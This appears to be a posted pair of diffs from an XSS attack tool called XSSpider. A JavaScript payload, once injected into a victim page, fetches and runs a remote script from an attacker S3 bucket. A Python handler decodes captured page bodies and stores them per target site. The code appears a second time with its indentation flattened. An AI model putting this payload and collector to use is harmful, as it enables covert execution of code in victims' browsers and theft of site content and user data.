K0G0 · September 10, 2020 00:29
diff --git a/XSSpider_payload.js b/XSSpider_payload.js
 var spider_URL = 'https://{{S3_Payload_Bucket}}.s3.amazonaws.com/spider.js';

 if (typeof(jQuery) == 'undefined') {
    (function(e, s) {
        e.src = s;
        e.onload = function() {
            Execute()
        };
        document.head.appendChild(e);
    })(document.createElement('script'), '//code.jquery.com/jquery-latest.min.js')
 } else {
    Execute()
 }

 function Execute() {
    $.getScript(spider_URL)
 }
diff --git a/XSSpider_store_data.py b/XSSpider_store_data.py
 raw_path = re.sub('^(\.{1,2}\/)*','',unquote(data['path'])).strip('/').lower()
 url_parts = raw_path.split('?')
 if len(url_parts) == 1:
    path_parts = url_parts[0].split('/')   
    if len(path_parts) == 1:
        if path_parts[0] == '':
            filename = '/index.html'
        else:
            filename = '/' +(path_parts[0] + '.html' if '.' not in path_parts[0] else path_parts[0])
    elif len(path_parts) > 1:
        path = '/' + '/'.join(path_parts[:-1])
        filename = '/' + (path_parts[-1] + '.html' if '.' not in path_parts[-1] else path_parts[-1])
 elif len(url_parts) == 2:
    if url_parts[0] == '':
        path = '/index'
    else:
        path = '/' + url_parts[0].split('.')[0]
    filename = '/%s.html'%(hashlib.md5(url_parts[1].encode()).hexdigest())

 file_data = base64.b64decode(data['body']).decode('utf-8')
 if file_data.startswith('data:image'):
    file_data = base64.decodebytes(bytes(file_data.split(',')[1],'utf-8'))

 s3_response = s3.put_object(
    Bucket=bucket_name,
    Key=data['site']+path+filename,
    Body=file_data,
    ACL='private'
 )
	var spider_URL = 'https://{{S3_Payload_Bucket}}.s3.amazonaws.com/spider.js';

	if (typeof(jQuery) == 'undefined') {
	(function(e, s) {
	e.src = s;
	e.onload = function() {
	Execute()
	};
	document.head.appendChild(e);
	})(document.createElement('script'), '//code.jquery.com/jquery-latest.min.js')
	} else {
	Execute()
	}

	function Execute() {
	$.getScript(spider_URL)
	}
	raw_path = re.sub('^(\.{1,2}\/)*','',unquote(data['path'])).strip('/').lower()
	url_parts = raw_path.split('?')
	if len(url_parts) == 1:
	path_parts = url_parts[0].split('/')
	if len(path_parts) == 1:
	if path_parts[0] == '':
	filename = '/index.html'
	else:
	filename = '/' +(path_parts[0] + '.html' if '.' not in path_parts[0] else path_parts[0])
	elif len(path_parts) > 1:
	path = '/' + '/'.join(path_parts[:-1])
	filename = '/' + (path_parts[-1] + '.html' if '.' not in path_parts[-1] else path_parts[-1])
	elif len(url_parts) == 2:
	if url_parts[0] == '':
	path = '/index'
	else:
	path = '/' + url_parts[0].split('.')[0]
	filename = '/%s.html'%(hashlib.md5(url_parts[1].encode()).hexdigest())

	file_data = base64.b64decode(data['body']).decode('utf-8')
	if file_data.startswith('data:image'):
	file_data = base64.decodebytes(bytes(file_data.split(',')[1],'utf-8'))

	s3_response = s3.put_object(
	Bucket=bucket_name,
	Key=data['site']+path+filename,
	Body=file_data,
	ACL='private'
	)